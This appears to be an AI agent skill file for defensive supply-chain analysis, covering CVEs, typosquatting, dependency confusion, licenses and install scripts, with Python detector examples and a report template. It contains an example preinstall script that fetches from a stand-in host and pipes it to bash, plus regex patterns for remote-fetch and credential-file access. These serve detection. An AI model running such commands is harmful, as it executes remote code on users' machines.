perseus-supply-chain
// Supply chain security analysis (CVEs, dependencies, typosquatting, licenses)
| name | perseus-supply-chain |
| description | Supply chain security analysis (CVEs, dependencies, typosquatting, licenses) |
IMPORTANT: This skill performs supply chain security analysis on the user's own codebase. This is defensive security testing to find vulnerable dependencies before they're exploited.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
| Language | Package Managers | Manifest Files |
|---|---|---|
| JavaScript/TypeScript | npm, yarn, pnpm, bun | package.json, package-lock.json, yarn.lock, pnpm-lock.yaml |
| Go | go modules | go.mod, go.sum |
| PHP | Composer | composer.json, composer.lock |
| Python | pip, poetry, pipenv | requirements.txt, Pipfile, pyproject.toml, poetry.lock |
| Rust | Cargo | Cargo.toml, Cargo.lock |
| Java | Maven, Gradle | pom.xml, build.gradle, gradle.lockfile |
| Ruby | Bundler | Gemfile, Gemfile.lock |
| C# | NuGet | *.csproj, packages.config, packages.lock.json |
This specialist skill performs comprehensive supply chain analysis including known vulnerabilities (CVEs), dependency confusion, typosquatting, and license compliance.
When to Use: After /scan identifies package manifests, or as a regular security hygiene check.
Goal: Identify vulnerable, malicious, or risky dependencies before they compromise the application.
| Mode | Specialist Behavior |
|---|---|
| PRODUCTION_SAFE | Manifest and advisory analysis only (passive) |
| STAGING_ACTIVE | Controlled resolver/registry validation in staging |
| LAB_FULL | Deep dependency behavior validation in isolated lab |
| LAB_RED_TEAM | Confusion/typosquat simulation against private test registries only |
Consult deliverables/engagement_profile.md before active package resolution checks. Default to PRODUCTION_SAFE when mode is missing.
| Risk | Description | Impact |
|---|---|---|
| Known CVEs | Published vulnerabilities | Exploitation |
| Typosquatting | Malicious similar-named packages | Malware |
| Dependency Confusion | Private/public package name collision | Code execution |
| Outdated Dependencies | Old versions with known issues | Security debt |
| License Issues | GPL in proprietary, license conflicts | Legal risk |
| Malicious Packages | Intentionally harmful packages | Backdoor |
| Abandoned Packages | Unmaintained dependencies | Future risk |
Read deliverables/engagement_profile.md, and deliverables/verification_scope.md if present.
Manifest Scanner:
Files to Find:
```text
# JavaScript/TypeScript
package.json
package-lock.json
yarn.lock
pnpm-lock.yaml
bun.lockb
# Go
go.mod
go.sum
# PHP
composer.json
composer.lock
# Python
requirements.txt
requirements-*.txt
Pipfile
Pipfile.lock
pyproject.toml
poetry.lock
# Rust
Cargo.toml
Cargo.lock
# Java
pom.xml
build.gradle
build.gradle.kts
gradle.lockfile
# Ruby
Gemfile
Gemfile.lock
# C#
*.csproj
packages.config
Directory.Packages.props
```
JavaScript CVE Analyst:
Check Using:
Output Format:
| Package | Version | CVE | Severity | Fixed In |
|---------|---------|-----|----------|----------|
| lodash | 4.17.15 | CVE-2021-23337 | High | 4.17.21 |
Go CVE Analyst:
Check:
Python CVE Analyst:
Check:
Multi-Language CVE Analyst:
Check:
JavaScript Typosquatting Analyst:
Common Patterns:
| Real Package | Typosquat Examples |
|---|---|
| lodash | lodsh, lodahs, 1odash, lodash-utils |
| express | expres, expresss, expess |
| react | raect, reakt, reactjs (unofficial) |
| axios | axois, axio, axiosjs |
Detection Rules:
Multi-Language Typosquatting Analyst:
Python Examples:
| Real Package | Typosquat Examples |
|---|---|
| requests | request, reqeusts |
| django | djang0, djangoo |
| flask | flaask, flaskk |
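The detection rules behind both tables, as an added example that is not part of this skill: a small Python detector that undoes homoglyph swaps and bolted-on suffixes, then applies an edit-distance-1 check against a trusted list. The KNOWN set and the sample dependency map are constructed for the demo.

```python
"""Typosquat detector for dependency names: added example, not the skill's code.
Flags an installed name that is not on a trusted list but sits within edit
distance 1 of one, or differs only by homoglyphs (1/l, 0/o) or a bolted-on
suffix. KNOWN and SAMPLE_DEPS are constructed for the demo."""
from __future__ import annotations

KNOWN = {"lodash", "express", "react", "axios", "requests", "django", "flask"}
HOMOGLYPHS = str.maketrans({"1": "l", "0": "o"})
SUFFIXES = ("-utils", "-js", ".js", "js")   # more specific forms first

def levenshtein(a: str, b: str) -> int:
    """Plain dynamic-programming edit distance."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def normalize(name: str) -> str:
    """Undo the cheap tricks: homoglyph swaps and one bolted-on suffix."""
    n = name.lower().translate(HOMOGLYPHS)
    for s in SUFFIXES:
        if n.endswith(s) and len(n) > len(s):
            return n[: -len(s)]
    return n

def check_name(name: str) -> tuple[str, str] | None:
    """Return (likely target, reason) if `name` looks like a typosquat, else None; hits are review items."""
    if name in KNOWN:
        return None
    norm = normalize(name)
    if norm in KNOWN:
        return norm, "homoglyph or suffix variant"
    for real in sorted(KNOWN):
        if levenshtein(norm, real) <= 1:   # one insertion, deletion or substitution
            return real, "edit distance 1"
    return None

def scan(deps: dict[str, str]) -> dict[str, tuple[str, str]]:
    """Map each suspicious dependency name to its (likely target, reason)."""
    return {d: hit for d in deps if (hit := check_name(d))}

# Constructed package.json "dependencies" map with two squats planted in it.
SAMPLE_DEPS = {"lodsh": "^4.0.0", "react": "^18.2.0", "1odash": "^4.17.0", "yargs": "^17.0.0"}

if __name__ == "__main__":
    for pkg, (target, why) in scan(SAMPLE_DEPS).items():
        print(f"{pkg}: likely typosquat of {target} ({why})")
```

Very short trusted names will produce distance-1 false positives, which is why the output is a confidence-rated review list rather than a verdict.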
Private Package Analyst:
Risk Pattern:
```jsonc
// package.json - RISKY
{
  "dependencies": {
    "@company/internal-lib": "^1.0.0" // If not in private registry...
  }
}
```
Attack: an attacker publishes a package named @company/internal-lib to public npm, so an unpinned resolver may fetch it instead of the private one.
Check:
Registry Configuration Analyst:
Files to Check:
```text
.npmrc
.yarnrc
.yarnrc.yml
.pip/pip.conf
~/.config/pip/pip.conf
```
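An added example (not the skill's own code) covering both the Private Package and Registry Configuration analysts: it parses `@scope:registry=` pins from .npmrc, lists scoped dependencies whose scope has no pin, and inspects a package-lock.json for private-scoped packages whose `resolved` URL points at the public registry. The package.json, .npmrc and lockfile contents, and the `@company`/`@acme` scopes and hosts, are constructed fixtures.

```python
"""Dependency-confusion check for an npm project: added example, not the skill's code.
Each scoped dependency in package.json should have its scope pinned to a private registry
in .npmrc; a private-scoped entry in package-lock.json whose `resolved` URL points at the
public registry is the live symptom of a name collision. All inputs are constructed."""
import json
import re
from urllib.parse import urlparse

PUBLIC_REGISTRY_HOSTS = {"registry.npmjs.org", "registry.yarnpkg.com"}

def parse_npmrc(text: str) -> dict[str, str]:
    """Return {'@scope': registry_url} for every `@scope:registry=` line."""
    pins = {}
    for line in text.splitlines():
        m = re.match(r"\s*(@[\w.-]+):registry\s*=\s*(\S+)", line)
        if m:
            pins[m.group(1)] = m.group(2)
    return pins

def unpinned_scopes(package_json: str, npmrc: str) -> list[str]:
    """Scoped dependencies whose scope has no registry mapping in .npmrc."""
    pkg = json.loads(package_json)
    pins = parse_npmrc(npmrc)
    deps = {**pkg.get("dependencies", {}), **pkg.get("devDependencies", {})}
    return sorted(d for d in deps if d.startswith("@") and d.split("/")[0] not in pins)

def public_resolutions(lockfile: str, private_scopes: set[str]) -> list[str]:
    """Private-scoped packages that the lockfile fetched from a public registry host."""
    lock = json.loads(lockfile)
    hits = []
    for path, meta in lock.get("packages", {}).items():  # lockfileVersion 2/3 layout
        name = path.rsplit("node_modules/", 1)[-1]
        host = urlparse(meta.get("resolved", "")).hostname or ""
        if name.split("/")[0] in private_scopes and host in PUBLIC_REGISTRY_HOSTS:
            hits.append(name)
    return hits

# Constructed fixtures: @company is declared but only @acme is pinned, and the lockfile shows @company/internal-lib came from public npm.
PACKAGE_JSON = json.dumps({"dependencies": {
    "@company/internal-lib": "^1.0.0", "@acme/ui": "^2.0.0", "lodash": "^4.17.21"}})
NPMRC = "@acme:registry=https://npm.acme.example/\nalways-auth=true\n"
LOCKFILE = json.dumps({"lockfileVersion": 3, "packages": {
    "node_modules/@company/internal-lib": {"version": "1.0.0",
        "resolved": "https://registry.npmjs.org/@company/internal-lib/-/internal-lib-1.0.0.tgz"},
    "node_modules/@acme/ui": {"version": "2.0.0",
        "resolved": "https://npm.acme.example/@acme/ui/-/ui-2.0.0.tgz"}}})

if __name__ == "__main__":
    print("scopes without a registry pin:", unpinned_scopes(PACKAGE_JSON, NPMRC))
    print("private packages resolved from public npm:", public_resolutions(LOCKFILE, {"@company", "@acme"}))
```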
Major Version Gap Analyst:
Risk Levels:
| Gap | Risk | Example |
|---|---|---|
| 1 major | Low | Using React 17 when 18 is out |
| 2+ major | Medium | Using React 16 when 18 is out |
| EOL | High | Using Node.js 14 (EOL) |
Abandoned Package Analyst:
Indicators:
License Compatibility Analyst:
Risk Matrix:
| Project License | Dependency License | Status |
|---|---|---|
| MIT | MIT | OK |
| MIT | Apache-2.0 | OK |
| MIT | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | AGPL-3.0 | CRITICAL |
License Discovery Analyst:
Issues:
Install Script Analyst:
Patterns to Flag:
```jsonc
// package.json - SUSPICIOUS
{
  "scripts": {
    "preinstall": "curl evil.com/shell.sh | bash",
    "postinstall": "node ./scripts/setup.js" // Check contents!
  }
}
```
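The install-script check as an added example (not the skill's code): it pattern-matches the lifecycle scripts npm runs automatically during `npm install` and flags a bare `node ./file.js` for manual review. The regex list and the sample manifest are constructed; the manifest mirrors the suspicious package.json above.

```python
"""Lifecycle-script triage for package.json: added example, not the skill's code.
npm runs preinstall, install, postinstall and prepare automatically on `npm install`,
so those keys are pattern-matched; a hit is a review item, not proof of malice.
SAMPLE is a constructed manifest."""
import json
import re

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# (label, regex) pairs, each searched in the whole script string.
RED_FLAGS = [
    ("remote fetch piped to shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")),
    ("eval or nested shell", re.compile(r"\beval\b|\bsh\s+-c\b")),
    ("base64-encoded payload", re.compile(r"base64\s+(-d|--decode)|atob\(")),
    ("credential or config file access", re.compile(r"\.npmrc|\.ssh/|\.aws/|\$\{?[A-Z_]*(TOKEN|SECRET|KEY)")),
    ("inline node doing network I/O", re.compile(r"node\s+-e\s+.*(https?\.request|fetch\(|net\.connect)")),
]
LOCAL_FILE = re.compile(r"\bnode\s+(\.?/?[\w./-]+\.[cm]?js)\b")

def triage_scripts(package_json: str) -> dict[str, list[str]]:
    """Return {lifecycle script: [labels]}; a script that only runs a local JS file
    gets 'runs local file: <path>' so the reviewer opens it, as the skill asks."""
    scripts = json.loads(package_json).get("scripts", {})
    findings: dict[str, list[str]] = {}
    for name in LIFECYCLE:
        cmd = scripts.get(name)
        if not cmd:
            continue
        labels = [label for label, rx in RED_FLAGS if rx.search(cmd)]
        m = LOCAL_FILE.search(cmd)
        if m and not labels:
            labels.append(f"runs local file: {m.group(1)}")
        if labels:
            findings[name] = labels
    return findings

# Constructed manifest: one script fetches and pipes to bash, one hides its logic in a file.
SAMPLE = json.dumps({"name": "demo", "scripts": {
    "preinstall": "curl evil.com/shell.sh | bash",
    "postinstall": "node ./scripts/setup.js",
    "prepare": "tsc -p .",
    "test": "jest"}})

if __name__ == "__main__":
    for script, labels in triage_scripts(SAMPLE).items():
        print(f"{script}: {'; '.join(labels)}")
```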
Red Flags:
Dependency Chain Analyst:
Issues:
Lockfile Security Analyst:
Issues:
Create deliverables/supply_chain_analysis.md:
# Supply Chain Security Analysis
## Summary
| Category | Packages Checked | Issues | Critical |
|----------|------------------|--------|----------|
| CVEs | X | Y | Z |
| Typosquatting | X | Y | Z |
| Dependency Confusion | X | Y | Z |
| Outdated | X | Y | Z |
| License | X | Y | Z |
| Malicious | X | Y | Z |
## Languages/Package Managers Detected
- JavaScript: npm (package.json)
- Python: pip (requirements.txt)
- Go: go modules (go.mod)
## Critical Vulnerabilities (CVEs)
### [CVE-2021-44228] Log4Shell in log4j
**Severity:** Critical (CVSS 10.0)
**Package:** org.apache.logging.log4j:log4j-core
**Installed Version:** 2.14.1
**Fixed Version:** 2.17.1
**Location:** pom.xml
**Description:** Remote code execution via JNDI lookup in log messages.
**Remediation:**
```xml
<dependency>
  <groupId>org.apache.logging.log4j</groupId>
  <artifactId>log4j-core</artifactId>
  <version>2.17.1</version>
</dependency>
```
**Severity:** High (CVSS 8.0)
**Package:** follow-redirects
**Installed Version:** 1.14.5
**Fixed Version:** 1.14.7
**Location:** package-lock.json (transitive via axios)
| Severity | Count | Packages |
|---|---|---|
| Critical | 2 | log4j, lodash |
| High | 5 | axios, node-forge, ... |
| Medium | 12 | ... |
| Low | 8 | ... |
| Installed | Suspicious | Confidence |
|---|---|---|
| lodsh | Likely typosquat of lodash | High |
| requests (in npm) | Python package in npm? | Medium |
| Package | Risk | Recommendation |
|---|---|---|
| @company/core | No registry lock | Add to .npmrc |
| Package | Current | Latest | Gap | Risk |
|---|---|---|---|---|
| react | 16.14.0 | 18.2.0 | 2 major | Medium |
| node | 14.x | 20.x | EOL | High |
| Package | License | Issue |
|---|---|---|
| some-lib | GPL-3.0 | Copyleft in MIT project |
| unknown-pkg | UNLICENSED | No license |
```bash
# JavaScript
npm audit fix
npm outdated
# Go
go get -u ./...
govulncheck ./...
# Python
pip-audit
pip list --outdated
# Rust
cargo audit
cargo update
```
**Next Step:** CVE findings can be verified by checking exploit availability and running automated scanners.